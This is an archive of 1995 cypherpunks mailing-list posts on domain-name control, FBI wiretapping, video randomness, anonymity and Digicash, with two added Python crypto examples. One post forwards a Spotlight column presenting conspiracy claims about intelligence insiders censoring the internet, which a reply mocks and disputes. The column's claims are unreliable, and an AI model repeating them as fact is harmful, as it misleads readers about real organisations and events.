
Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."
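
[Added example, not part of the original thread and not code from any program mentioned in it: one way to turn video frames into a seed, showing the point raised above that low entropy per sample can be made up by volume. The frames are simulated from a seeded PRNG so the demo is repeatable (so the printed seeds are not secret); the frame size, the two-low-bits choice, the plain most-common-value estimate and the 4x safety factor are assumptions of this sketch.]

```python
import hashlib
import math
import random
from collections import Counter

WIDTH, HEIGHT = 32, 24     # tiny constructed frame, 768 pixels
SEED_BITS = 256            # size of the seed we want to produce
SAFETY_FACTOR = 4          # demand 4x the estimate: pixel noise is not truly independent


def simulated_frames(count, noise_sigma, rng):
    """Constructed stand-in for a camera: one fixed scene plus Gaussian sensor noise.

    The noise comes from a seeded PRNG so the demo is repeatable; it is NOT a
    real entropy source. Feed real captured frames (bytes, 8-bit grey) in practice.
    """
    scene = [(x * 7 + y * 13) % 256 for y in range(HEIGHT) for x in range(WIDTH)]
    for _ in range(count):
        yield bytes(min(255, max(0, round(p + rng.gauss(0, noise_sigma)))) for p in scene)


def noise_samples(frames):
    """Difference consecutive frames so the predictable picture cancels out,
    then keep only the two low-order bits of each pixel difference."""
    samples, prev = [], None
    for frame in frames:
        if prev is not None:
            samples.extend((a - b) & 0x03 for a, b in zip(frame, prev))
        prev = frame
    return samples


def min_entropy_per_sample(samples):
    """Most-common-value estimate: -log2(p_max), with no confidence correction.
    A constant stream (stuck or frozen feed) scores exactly 0 bits."""
    if not samples:
        return 0.0
    p_max = Counter(samples).most_common(1)[0][1] / len(samples)
    return -math.log2(p_max) if p_max < 1.0 else 0.0


def entropy_credit(frames):
    """Estimated total bits of min-entropy in the noise extracted from `frames`."""
    samples = noise_samples(frames)
    return min_entropy_per_sample(samples) * len(samples)


def seed_from_frames(frames):
    """Condense the noise samples into a 256-bit seed with SHA-256.
    Refuses (ValueError) unless the estimate covers SEED_BITS * SAFETY_FACTOR."""
    frames = list(frames)
    credit = entropy_credit(frames)
    needed = SEED_BITS * SAFETY_FACTOR
    if credit < needed:
        raise ValueError(f"estimated {credit:.0f} bits of noise, need {needed}")
    return hashlib.sha256(bytes(noise_samples(frames))).digest()


if __name__ == "__main__":
    for label, count, sigma in [("frozen feed, 10 frames", 10, 0.0),
                                ("quiet sensor, 3 frames", 3, 0.3),
                                ("quiet sensor, 10 frames", 10, 0.3),
                                ("noisy channel, 3 frames", 3, 2.0)]:
        frames = list(simulated_frames(count, sigma, random.Random(1995)))
        try:
            print(label, "->", seed_from_frames(frames).hex())
        except ValueError as err:
            print(label, "-> refused:", err)
```

The quiet sensor is refused at 3 frames and accepted at 10: the per-sample estimate is the same, only the volume changed. The frozen feed is refused however many frames it delivers.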






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Mon, 6 Nov 1995 02:03:06 +0800
To: cypherpunks@toad.com
Subject: censored? corrected
Message-ID: <199511020847.AAA10833@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


NOTE: More than 8 hours have passed since I sent this text in plaintext
directly to Cypherpunks without its being posted, so in this attempt I am
sending it encrypted through ALUMNI remailer. - Gary Jeffers
gjeffers@socketis.net


                    INFO BLACKOUT

 From THE SPOTLIGHT newspaper's TECHNOLOGY & LIBERTY column by Clark
Matthews - Nov. 06, 1995 issue.

   Powerful national security insiders have established effective control
over the entrance gateways to Internet. Disturbing signs are now emerging
that the "information superhighway" has been targeted for systematic sur-
veillance and political dossier-building on Americans' opinions.

   This ominous news came in the first of a series of articles by investi-
gative journalist Steven Pizzo in WEB REVIEW, an online magazine of cyber-
culture and politics (http://gnn.com/wr/) published by Songline Studios of
San Francisco. Pizzo is the author of INSIDE JOB, a groundbreaking expose'
on the massive fraud and theft of insured deposits in 1980s savings and
loan debacle.

   According to Pizzo, control of Internet "domain name registration" has
passed into private hands-with the potential for serious mischief or
worse. "Domain names" are the odd looking identifying names that are as-
signed to individual computer systems that compose the Internet (logoplex.
com, for example).

   Through a complex chain of licensing arrangements and corporate acqui-
sitions detailed in Pizzo's article, this crucial control over Internet
domain names has passed from the non-profit National Science Foundation to
Network Solutions, Inc. (NSI) of Herndon, Virginia. Last May, amid growing
public disbelief of Establishment media reports about the Oklahoma City
bombing provocation, NSI was purchased by Scientific Applications Interna-
tional Corporation (SAIC) of San Diego.

   SAIC is a $2 billion defense and FBI contractor with a board of direc-
tors that reads like a Who's Who of the intelligence community. Board
members include Admiral Bobby Ray Inman, the former director of the Na-
tional Security Agency (NSA) and deputy director of the CIA; Melvin Laird,
defense secretary under Richard Nixon; Donald Hicks, former head of re-
search & development for the Pentagon; Donald Kerr, former head of the Los
Alamos National Laboratory; and Gen. Maxwell Thurman (ret.), the commander
of the U.S. invasion of Panama.

   Former members of SAIC's board include Robert Gates, the former CIA
director under George Bush; current CIA director John Deutch; Anita Jones,
Deutch's former Pentagon procurement officer, and William Perry, the pre-
sent secretary of defense.

   The corporation also has a legion of computer network specialists and
an entire division of computer consultants. SAIC currently holds contracts
for re-engineering the Pentagon's information systems, automating the
FBI's computerized fingerprint identification system, and building a
national criminal history information system.

   The Internet is a marvel of computer software technology. It was de-
signed to survive a nuclear attack on the United States-like the Post
Office, it's literally smart enough to find a way to get the mail through,
even if most of the network is missing.

   But control of Internet domain name registration means the ability to
remove troublesome-or outspoken-computer systems from the network. Po-
tentially, this control also confers the power to insinuate "phantom"
domains into the network-for surveillance purposes, for example-or for
real-time, automatic censorship.

   Furthermore, anecdotal evidence gathered by this author suggests that
actual "truth control" is taking place on the 'net now. E-mail messages
with controversial contents-including the details of the SAIC takeover of
domain names-have consistently disappeared as they travel across the
network. News items concerning the Vincent Foster "suicide" investigation
and allegations of NSA bank spying through compromised Inslaw software are
being quickly and automatically canceled. And the cancellations are not by
their authors.

CRACKDOWN

   With domain names under the control of secret government insiders, it
is even theoretically possible that large parts of the Internet could be
SHUT DOWN AND SILENCED at critical times. This could be accomplished by
suddenly altering domain name registrations or interposing compromised
"domains" at crucial points.

   These compromised systems could serve as "black holes" at critical
times, stopping e-mail and important news from reaching the world-or the
rest of the country.

   Exercises in "turning the Internet off" have already taken place in
Taiwan and Hong Kong. In Taiwan, the 'net was successfully shut down.
All network traffic-including news, opinions and e-mail sent by computer
users-was successfully "bottled up" on the island and prevented from
reaching the world.

   In Hong Kong, the Internet wasn't quite strangled, but the British
authorities who control that colony managed to throttle free electronic
speech with the rest of the world until everything was bottlenecked into
a few little-known satellite links.

   These are alarming precedents and sure signs that powerful, shadowy
forces are preparing to chop at the very roots of America's new Liberty
Tree. The secretive people on the board of directors of SAIC are
intelligence professionals skilled at manufacturing events-and then
manufacturing public opinion and consent by controlling the truth. Will
Internet disinformation, censorship or "shutdowns" signal the next American
crisis?







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Andrew D. Isaacson" <adisaacs@mtu.edu>
Date: Thu, 2 Nov 1995 14:27:58 +0800
To: cypherpunks@toad.com
Subject: Video as a source of randomness
Message-ID: <199511020602.BAA23380@supreme.csl.mtu.edu>
MIME-Version: 1.0
Content-Type: text


A thought just occurred to me...

How useful would it be to use a video stream as a source of random input
to something like /dev/random?  I'm thinking along the lines of a
Connectix QuickCam (sp?) or the cool videocam that comes with the Indy.
It seems to me that the picture received by a camera sitting atop a
monitor would be quite unpredictable. (relatively) High bandwidth, too.
Even if the entropy in a video signal is low, the high bandwidth would
seem to make up for it.

Struggling to keep my head above the crypto tide,
andy
-- 
Andrew Isaacson <adisaacs@mtu.edu>    finger adisaacs@colossus.csl.mtu.edu 
Freshman/Comp Sci @ Michigan Technological University   for PGP public key
==========================================================================
"Hi, I'm, I'm, I'm... you'll have to forgive me, I'm terrible with names."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Campbell <edge@got.net>
Date: Mon, 6 Nov 1995 02:03:07 +0800
To: cypherpunks@toad.com
Subject: FBI seeks huge wiretapping system
Message-ID: <199511020955.BAA04564@you.got.net>
MIME-Version: 1.0
Content-Type: text/plain


In today's San Jose Mercury, online edition. Forgive me if this has already
been passed around.

-=-

FBI seeks huge wiretapping system

BY JOHN MARKOFF

New York Times

The FBI has proposed a national wiretapping system of unprecedented size and
scope that would give law enforcement officials the capacity to monitor
simultaneously as many as one out of every 100 phone lines in some high
crime areas of the country.

Such a surveillance ability would vastly exceed the current needs of law
enforcement officials around the country, who in recent years have conducted
an annual average of less than 850 court-authorized wiretaps -- or fewer
than one in every 174,000 phone lines.

The plan, which needs congressional approval for the money to finance it,
would still require a court warrant to conduct wiretaps. Still, the proposed
expansion of the government's eavesdropping abilities raises questions among
telephone industry executives as to why the FBI believes it may require such
broad access to the nation's phone network in the future.

And privacy-rights advocates see the specter of a Big Brother surveillance
capability whose very existence might encourage law enforcement officials to
use wiretapping much more frequently as an investigative tool.

``A proposal that envisions some form of electronic surveillance for one of
every 100 telephone lines would be frightening to many people,'' said James
Dempsey, deputy director at the Center for National Security, a public
policy organization in Washington. ``I think law enforcement needs to be
honest with the public about what its intentions are.''

Generally, FBI officials contend that an advanced, high-capacity monitoring
system will be necessary as more of modern life and business -- and crime --
takes place as voice or computer conversations over digital phone lines.

On digital lines, communications are transmitted in electronic pulses
represented by the 1's and 0's of computer code. Such communications are
harder to monitor than with the old-fashioned analog lines in which
conversations are transmitted as electronic signals corresponding to audible
sound waves.

An FBI spokesman declined to elaborate on the bureau's perceived need for
such an expansion of its wiretapping abilities.

``The full implementation is absolutely essential for law enforcement and
public safety,'' said Mike Kortan, an FBI spokesman in Washington. ``We are
in ongoing discussions with the communications industry. Therefore it would be
inappropriate to comment further at this point.''

The plan, which was published in the Federal Register on Oct. 16 but has not
drawn much attention yet outside law enforcement and industry circles, is
the first comprehensive outline by the FBI of the surveillance capabilities
it will require under the controversial Digital Telephony Act that was
signed by President Clinton in 1994.

The law was adopted in the closing hours of the previous Congress after the
administration overcame telephone industry resistance to the extensive
network equipment changes that will be required to permit digital
wiretapping. In order to overcome that opposition, the administration
promised that the government would allocate $500 million to help upgrade
industry networks.

Whether the law will ever go into effect is an open question, because it
requires a federal appropriation, to be paid for out of criminal fines and
penalties, that Congress has not yet authorized. The budget legislation now
pending on Capitol Hill has no proviso for the digital wiretapping money,
although the House budget bill included a wiretapping allocation until last
week.

The House measure was deleted after objections from several freshman
Republicans, including Rep. Bob Barr of Georgia, a former federal
prosecutor, who said that he objected to the way the money for wiretapping
would be raised and that he had concerns about how the FBI might use such a
sweeping surveillance ability.

But some lawmakers say the Clinton administration, which has vowed to veto
the current federal budget bill, saw little point in pushing for inclusion
of the financing for the wiretapping at this time.

And others note that money for the digital wiretapping plan, presented as a
tough anti-crime measure, could be difficult for lawmakers of either party
to oppose outright. The FBI and the Clinton administration are expected to
continue seeking funds in the future.

The scope of the FBI plan has startled telephone industry executives, who
said it was difficult to estimate how much it would ultimately cost to carry
out the capacity increases. The officials are worried, however, that if
federal funds are not forthcoming, the government may attempt to shift the
financing burden to the rates that businesses and consumers pay to use the
telephone network.

``The difficulty in this process is going to come down the road when they
ask us to redesign our entire systems and not pay us,'' said Larry Clinton,
associate vice president for governmental affairs at the U.S. Telephone
Association, a Washington-based industry lobbying group. ``If they try to
make rate payers pay for this we will run into serious and perhaps even
constitutional problems which we hope to avoid.''

The FBI plan, as filed in the Federal Register, calls for designating each
local telephone as falling under one of three categories. Category I would
be made up of urban areas, where most electronic surveillance currently
takes place. In these regions, telecommunications carriers would be required
to make available up to 1 percent of their network capacity when sought by
law-enforcement officials.

In lower-crime urban and suburban areas, designated Category II, phone
companies would need to make available up to five-tenths of a percent of
their network lines, while the predominantly rural low-crime Category III
areas would require 0.25 percent.

For many of the most densely populated metropolitan areas, like New York,
Los Angeles and Chicago, there are tens of millions of phone lines. The FBI
document contends that in such places, the demands of digital wiretapping
may make it necessary to intercept tens of thousands of phone calls at once.

Some industry officials said they were at a loss to understand how the
government expected to make use of such requirements. At an industry
gathering last year, telephone industry executives discussing the Digital
Telephony Act could not think of an example of more than seven wiretaps ever
being run from a single phone company office at any one time, according to
Ron Peat, director of federal legislation analysis for the Pacific Telesis
Group, the San Francisco-based regional Bell company.

Some technology experts said that the FBI's projected needs, which the
bureau said were based on historical records and on demographic data and
market forecasts, reflect a growing belief by law enforcement that
electronic surveillance will rapidly increase in importance in the digital
age, where most communications will take place using an array of mobile
computerized devices.

``These are staggering numbers,'' said Mark Rasch, director of information
security law and policy for Science Applications International Corp. in
McLean, Va. ``Either they do a lot more wiretaps than they now admit, or
they plan on doing a significant larger number of wiretaps in the future
because of the fear of domestic terrorism.''
--
   Jay Campbell                edge@got.net - Operations Manager
   -=-=-=-=-=-=-               Sense Networking, Santa Cruz Node
   Jay@Campbell.net            got.net? PGP MIT KeyID 0xACAE1A89           
 
"On the Information Superhighway, I'm the guy 
  behind you in this morning's traffic jam leaning on his horn."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gjeffers@socketis.net (Gary Jeffers)
Date: Thu, 2 Nov 1995 16:32:23 +0800
To: cypherpunks@toad.com
Subject: Was I censored before Cypherpunks?
Message-ID: <199511021217.GAA09629@mail.socketis.net>
MIME-Version: 1.0
Content-Type: text/plain


::
Encrypted: PGP







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 3 Nov 1995 05:19:44 +0800
To: cypherpunks@toad.com
Subject: Re: censored? corrected [Steve Pizzo cited in The Spotlight]
In-Reply-To: <199511020847.AAA10833@jobe.shell.portal.com>
Message-ID: <Pine.ULT.3.91.951102013958.18049A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 2 Nov 1995 anonymous-remailer@shell.portal.com wrote:

> NOTE: More than 8 hours have passed since I sent this text in plaintext
> directly to Cypherpunks without its being posted, so in this attempt I am
> sending it encrypted through ALUMNI remailer. - Gary Jeffers
> gjeffers@socketis.net

Shit happens.

>                     INFO BLACKOUT

BWAHAHAHA!

>  From THE SPOTLIGHT newspaper's TECHNOLOGY & LIBERTY column by Clark
> Matthews - Nov. 06, 1995 issue.

The Spotlight's official classification in the UC and Stanford library
databases is "Serials -- Anti-Semitic." I don't mean to offend anyone too
much, but the Spotlight is generally regarded to be rather lunatic-fringe.
Though the same is probably said of anyone on the cypherpunks list, hmm... 

>    This ominous news came in the first of a series of articles by investi-
> gative journalist Steven Pizzo in WEB REVIEW, an online magazine of cyber-
> culture and politics (http://gnn.com/wr/) published by Songline Studios of

Spotlight tends to be rather vague in its sources for a reason. I found
the article to which this apparently refers at
http://gnn.com/gnn/wr/sept29/news/natl/index.html. It is rather less
lurid, but might still be of moderate concern. See the October 13
followup. 

I'm copying this to Steve Pizzo. I'm sure he'll get a real kick out of
being cited in The Spotlight, whose politics are a little different than 
his.

>    Through a complex chain of licensing arrangements and corporate acqui-
> sitions detailed in Pizzo's article, this crucial control over Internet
> domain names has passed from the non-profit National Science Foundation to
> Network Solutions, Inc. (NSI) of Herndon, Virginia. Last May, amid growing
> public disbelief of Establishment media reports about the Oklahoma City
> bombing provocation, NSI was purchased by Scientific Applications Interna-
> tional Corporation (SAIC) of San Diego.

This is semantically and logically equivalent to:

Last May, amid growing public disbelief of Establishment media reports 
about the Oklahoma City bombing provocation [provocation?], Fred Rogers 
changed his shoes.

Obviously, Mr. Rogers is part of the conspiracy.

>    SAIC is a $2 billion defense and FBI contractor with a board of direc-
> tors that reads like a Who's Who of the intelligence community. Board
> members include Admiral Bobby Ray Inman, the former director of the Na-
> tional Security Agency (NSA) and deputy director of the CIA; Melvin Laird,
> defense secretary under Richard Nixon; Donald Hicks, former head of re-
> search & development for the Pentagon; Donald Kerr, former head of the Los
> Alamos National Laboratory; and Gen. Maxwell Thurman (ret.), the commander
> of the U.S. invasion of Panama.

I know that at least part of this is true, at least in part.

SAIC also designed the hull of the Stars & Stripes yacht that won the 
America's Cup. Obviously Dennis Conner is part of a conspiracy that 
involves the Bavarian Illuminati, the Pope (who visited San Diego once), 
and New Zealand. Isn't it suspicious that the last America's Cup was 
contested and finally decided by the New York Supreme Court, the seat of 
the World Jewish Conspiracy?

Disclaimer: I was born in the San Diego area, and I know people who 
worked at SAIC, so I'm probably part of the conspiracy too.

>    The Internet is a marvel of computer software technology. It was de-
> signed to survive a nuclear attack on the United States-like the Post
> Office, it's literally smart enough to find a way to get the mail through,
> even if most of the network is missing.

I believe this is the first time I have seen the Post Office favorably 
cited.

>    But control of Internet domain name registration means the ability to
> remove troublesome-or outspoken-computer systems from the network. Po-
> tentially, this control also confers the power to insinuate "phantom"
> domains into the network-for surveillance purposes, for example-or for
> real-time, automatic censorship.

Anyone capable of sending this message should have known that this was 
complete BS.

>    Furthermore, anecdotal evidence gathered by this author suggests that
> actual "truth control" is taking place on the 'net now. E-mail messages
> with controversial contents-including the details of the SAIC takeover of
> domain names-have consistently disappeared as they travel across the
> network.

And now we have PROOF! For THIS VERY MESSAGE, sent to THIS VERY LIST only
EIGHT HOURS AGO was MYSTERIOUSLY DISAPPEARED! Hide the women and children!

> News items concerning the Vincent Foster "suicide" investigation
> and allegations of NSA bank spying through compromised Inslaw software are
> being quickly and automatically canceled. And the cancellations are not by
> their authors.

I know that several people who have been spamming the net with Foster 
garbage have been UDP'd. Read back issues of news.admin.net-abuse.misc.

> CRACKDOWN
> 
>    With domain names under the control of secret government insiders, it
> is even theoretically possible that large parts of the Internet could be
> SHUT DOWN AND SILENCED at critical times. This could be accomplished by
> suddenly altering domain name registrations or interposing compromised
> "domains" at crucial points.
> 
>    These compromised systems could serve as "black holes" at critical
> times, stopping e-mail and important news from reaching the world-or the
> rest of the country.
> 
>    Exercises in "turning the Internet off" have already taken place in
> Taiwan and Hong Kong. In Taiwan, the 'net was successfully shut down.
> All network traffic-including news, opinions and e-mail sent by computer
> users-was successfully "bottled up" on the island and prevented from
> reaching the world.
> 
>    In Hong Kong, the Internet wasn't quite strangled, but the British
> authorities who control that colony managed to throttle free electronic
> speech with the rest of the world until everything was bottlenecked into
> a few little-known satellite links.

Hmm, few specifics here. I wonder if they would care to elaborate. Nah.

It is, of course, true that countries including Singapore, China, 
Vietnam, and Cuba control net access rather tightly, and there have been 
reprisals against online dissidents.

>    These are alarming precedents and sure signs that powerful, shadowy
> forces are preparing to chop at the very roots of America's new Liberty
> Tree. The secretive people on the board of directors of SAIC are
> intelligence professionals skilled at manufacturing events-and then
> manufacturing public opinion and consent by controlling the truth. Will
> Internet disinformation, censorship or "shutdowns" signal the next American
> crisis?

Only the Shadow knows.

- -rich
 llurch@networking.stanford.edu


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMJiap43DXUbM57SdAQHjBQP7BaaL0fgVCIpI5HDrTJ4TjtJgyjRWPWYU
vr2PuFBEGNZffzijaf9MTtwgjsYvy8/cMBuUiaBVIyVQloI1wfQMlHX1tVfnI6JM
hyT9zUJ4qovwsLCu+yX8JV1Ug2GtgyrW6AJJic+oFNohBJs8nQKxizwhVMa9AFrf
eAtmHLE+wsE=
=Qyen
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gjeffers@socketis.net (Gary Jeffers)
Date: Thu, 2 Nov 1995 17:31:15 +0800
To: cypherpunks@toad.com
Subject: Was I censored by a sophisticated word parser/key word searcher?
Message-ID: <199511021323.HAA09729@mail.socketis.net>
MIME-Version: 1.0
Content-Type: text/plain


My original plaintext post of Internet control by spooks has still not been 
posted. I have made 2 posts since that were posted quickly. Are things 
getting BAD!? Could I have fucked up? Do remailers now have a new use? 
Should remailers with encryption be used to spread the alarm to the rest of 
the Internet? My fellow Cypherpunks with bigger Internet mechanics brains 
should check this out. Can the original BLACKOUT post be reposted to other 
mailing lists or will it be censored? Check it out! - Beat State! - Gary Jeffers





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (t byfield)
Date: Thu, 2 Nov 1995 18:12:51 +0800
To: cypherpunks@toad.com
Subject: Re: Was I censored <etc.>
Message-ID: <v02120d01acbe45596b38@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 3:15 AM 11/2/95, Gary Jeffers wrote:
>My original plaintext post of Internet control by spooks has still not been
>posted. I have made 2 posts since that were posted quickly. Are things
>getting BAD!? Could I have fucked up? Do remailers now have a new use?
 <etc.>

And at 4:45 am or so, having worked all bloody night--having received all
the posts you mention--I'm responding:

        (1) Chill out, chum.
        (2) CP maybe isn't the best place to post internal dialogues.
        (3) There's a good chance that many people on this list have had
            one or another experience with automagically/mysteriously
            delayed mail: AFAICT, we're all still here. If you'd like,
            I'll confirm that I heard my echo from the listserv.
and    (4)  If you live around the NY/NY area, give WFMU some money; and
            even if you don't, give them some money. If the spooks are
            ever stupid enough to "black out" the net, some fruit with
            very fine musical taste at FMU will let everyone know. But
            only with your support.

            Ted






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Thu, 2 Nov 1995 19:41:54 +0800
To: cypherpunks@toad.com
Subject: Re: [FRED] Anonymity and Integrity
In-Reply-To: <199511020504.AAA19291@thor.cs.umass.edu>
Message-ID: <9511021110.AA01070@all.net>
MIME-Version: 1.0
Content-Type: text


> Dr. Frederick B. Cohen writes:
> > I have been convinced for some time that you can't have both integrity and
> > anonymity.  
> [and in a followup]
> > I might be misinterpreted as having meant that it is impossible to have
> > both integrity and anonymity. That is not what I meant, [...]
> 
> Er, thanks for the clarification....

A typical quotation taken out of context.  You missed the part after "I
meant" where I explained that I meant you couldn't assure ...  - That
is, you could have both or not have both, but you couldn't be certain
that you had both.

> > Integrity:= 1) Steadfast adherence to a strict moral and ethical code.
> > 	2) A state of being unimpaired; soundness.
> > 	3) The quality or condition of being whole or undivided; soundness
> > 	Also) soundness, completeness,
> > Alternatively:
> > 	1) Strict personal honesty and independence...
> > 	2) Completeness; unity...
> > 	3) The state of being unimpaired; soundness...''
> > 
> > In this context, I might be misinterpreted as having meant that it is
> > impossible to have both integrity and anonymity.  That is not what I
> > meant, although it is probably also true in a very strict sense.
> 
> All right, what makes you think that ?  Lest we wave our hands too much and
> totally misunderstand each other, let me lay down a more concrete scenario.
> If you have a substantially different scenario in mind, let me know.
> 
> Suppose that I send an anonymous message to a public forum such as this. I
> and the message seem to "have anonymity" by any standard I can presently
> imagine. Now, in what ways might I or the message lack integrity in this
> situation ?  

If the message was not of any particular import to anyone, integrity
would not be a very big issue, but suppose you took quotes out of
context and cleverly tried to construct a picture of the other person
as not being reputable.  People who read the message might believe that
what you said was true, or at least had a grain of truth to it.  That
sort of message lacks integrity, and the reason it lacks integrity is
because it has anonymity, not just because it's false and misleading.

To clarify even further, I seem to recall a posting some months ago from
an anonymous source declaring a new on-line for-sale forum called the
Internet Security Newsletter (or some such thing).  The anonymity of the
poster in the context of asking for money and the fact that one of the
people who was claimed to be on the board of editors was not, in fact, a
participant, led to the question of who the person was.  It turned out
that this person had a substantial history of putting forth falsehoods
as well as other related things that might have been very helpful in
evaluating the credence of his statements.  It turned out that the
newsletter was, at least in some sense and without making value
judgements, legitimate; but the anonymity of the person making the posts
made it harder to assure the integrity of the statements made, which
exacerbated the assurance issue. 

> I haven't broken my personal ethical codes, although perhaps
> I've violated someone else's. I have been honest, at least as much as I am
> generally honest in anything I write. I am not lying by donning the cloak of
> anonymity; I have not misrepresented my identity, merely refused to reveal
> it. The content of the message can be considered sound as much as anything
> else can. The message is incomplete in the sense that it does not include
> the true identity of the author -- is this what you would claim as a
> failure of integrity ?  All messages are incomplete in the sense that
> various important facts are absent from them.

I don't know you, which also means that I don't know your motives.  This
brings up the problem that, even though your postings may be true and
your motives honorable, they may not be, and there is no way to look
into your background and evaluate your history in order to assess your
statements.  In many cases, I believe statements because of their source
and my experience with that source.

I understand that over time, reputations can be built up for pseudonyms
(which are not necessarily anonyms) but then, with a pseudonym we might
reasonably ask what the motive is for hiding the real identity.  Is it
for fun? Because it's there? In solidarity for those who have legitimate
reasons for remaining anonymous? Or is it a means to influence others
for personal or national gain? Is it a way of spreading disinformation?
Is it a way to escape liability for slanderous statements? Is it a way
to keep people from finding out that there is a personal grudge being
played out? Without knowing the motive, how can we assess the
statements? In fact, how can we know that the original pseudonym still
applies? Someone could kill you and take over your pseudonym, and even
though we might hear of your death, the pseudonym might continue based
on your reputation but with another actual source.

It's an interesting concept that each statement should/could be taken on
its own and evaluated independently of the rest of a person's life
context, but in my experience, that has serious problems.

> > To clarify, I don't think you can assure integrity when you have anonymity.
> > 
> > This follows from my earlier writings (circa 1984-89), which are fairly
> > extensive, and in which I made the only marginally supported claim that
> > you can't have (i.e., assure) both integrity and secrecy in a system
> > with sharing.  This came originally from the result that integrity +
> > secrecy = no sharing (ala the combination of Biba and Bell-LaPadula)
> > which was extended into a POset which characterizes the extent to which
> > integrity and secrecy can be maintained based on transitive information
> > flow.
> > 
> > The less mathematical reasoning is that in order to be able to verify
> > integrity, you have to be able to examine the information that is
> > secret, while having secrecy requires that you not be able to have
> > independent verification.  Thus the two limit each other. 
> > 
> > Anonymity, in this context, can be thought of as secrecy.
> 
> I understand the nature of the information flow argument, but I don't see
> that it's applicable. You appear to contend that the assurance of the
> integrity of an anonymous message depends upon the examination of
> information that is "secret", that is, _not part of the message_. But no
> message is complete -- all messages have many such associated "secrets" not
> available as part of the messages. So the claim seems to be vacuous: we
> can assure the integrity of neither anonymous nor verinymous messages.

An important point.  The more we know, the more certain we can be.  With
computer-based anonymity as it is practiced today, and ignoring the
examples of the pseudonyms that were broken by legal warrant, we have
very little knowledge about the originator of a message, and thus we
have very little assurance of the integrity of their messages.  The
history built up over time for a given pseudonym certainly increases the
assurance associated with it, but there are other problems with this.

Example: I have two (N) pseudonyms that put forth different points of
view specifically directed to create different kinds of credence to
different audiences.  If the audiences knew that both (several) of the
pseudonyms were in fact the same person, they would have very different
beliefs about the individual given the combined picture than they might
get from any one of the pictures.

> Perhaps the rejoinder will be that anonymous messages have a 
> _characteristic_ piece of missing "secret" information, namely the senders'
> True Names. But you have yet to offer any argument that only certain special
> "secrets" must be examined in order to verify integrity.

It's not only the True Name that's at issue.  It's the association of a
set of messages and historical information with a source.  For example,
if we knew you were a KGB agent working in the disinformation and
economic espionage branches, we might evaluate your postings differently
than if we knew you were a high-school student from Duluth whose father
taught her a lot about cryptography when she was young.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 3 Nov 1995 00:34:44 +0800
To: cypherpunks@toad.com
Subject: Re: ecash remailer
In-Reply-To: <199511020239.SAA27491@ix.ix.netcom.com>
Message-ID: <199511021523.HAA19598@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


It's very frustrating to have to speculate so much due to the lack of
information.  Imagine how we would react if Cybercash or Netscape had
gone forward with what they claimed were secure protocols but had
refused to publish them, referring simply to old papers on RSA and
DES.  Yet Digicash gets away with this.

Bill Stewart <stewarts@ix.netcom.com> writes:

>At 01:20 PM 11/1/95 -0500, Michael Froomkin <froomkin@law.miami.edu> wrote:
>>I thought a property of Chaumian DigiCash was that a coin *had* to go back
>>to the bank before it could be spent again.  

>No.  The basic Chaum Digicash method looks like this:
>1) Alice creates a number of a recognizable form (Chaum's 1985 CACM paper
>uses n1n2n3...n64n1n2n3....n64, i.e. a 64-bit number concatenated with itself).
>2) Alice blinds the number and sends it to the bank (along with some request
>for withdrawing money from her account or payment in other coin or whatever.)
>3) The bank signs the number and sends it back.
>4) Alice unblinds the coin; now it's good, recognizably signed, and untraceable.

We presume it works basically like this, but there could be elaborations.
In particular, I have heard (from people who claim to know) that the
payee is normally embedded into the coin at spending time.

>>Logically, I can see at least four possibilities:
>>1) payee data is encoded onto the coin at time of payment, making it 
>>impossible for Carol to bank the coin.  I see no evidence of this in the 
>>docs at the Digicash site, but I just rechecked quickly and may have 
>>missed it.

>The basic protocol doesn't say anything about what a valid coin looks like;
>you could use the example in Chaum's paper or a long string followed by
>a checksum or whatever.  You _could_ put the payee's name account number
>in the string as the 64-bit "random" number, or even put both payer and payee.
>The bank could insist on that sort of thing if they wanted.
>If I remember right, the version in the Digicash trial left you the choice
>of filling in a specific payee or using "@" for bearer-payable coins.

Doing this would require the payee to be known at withdrawal time, which
is not apparently how it works.  I would speculate that actually what
happens is that the "basic coin" as above is encrypted, along with the
payee identity, all under the public key of the bank.  This way the
identity could not be stripped out by the payee or by a thief who snooped
the transmission.

Hal
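
The four withdrawal steps quoted above, worked through with raw RSA blinding. This is an added example, not code from this post or from Digicash, whose actual protocol the thread notes is unpublished; the `Bank` class, the function names and the toy key built from two Mersenne primes are assumptions made for illustration.

```python
import math
import secrets

# Toy RSA key for the bank, built from two Mersenne primes so the example is
# reproducible offline. Constructed for illustration only: far too small and
# too structured for real use.
P = 2**127 - 1
Q = 2**89 - 1
N = P * Q
E = 65537
D = pow(E, -1, (P - 1) * (Q - 1))    # bank's private exponent

HALF_BITS = 64                        # coin = 64-bit serial || same serial


def make_coin(serial=None):
    """Step 1: a 64-bit number concatenated with itself (the recognizable form)."""
    if serial is None:
        serial = 1 + secrets.randbelow(2**HALF_BITS - 1)
    return (serial << HALF_BITS) | serial


def is_recognizable(m):
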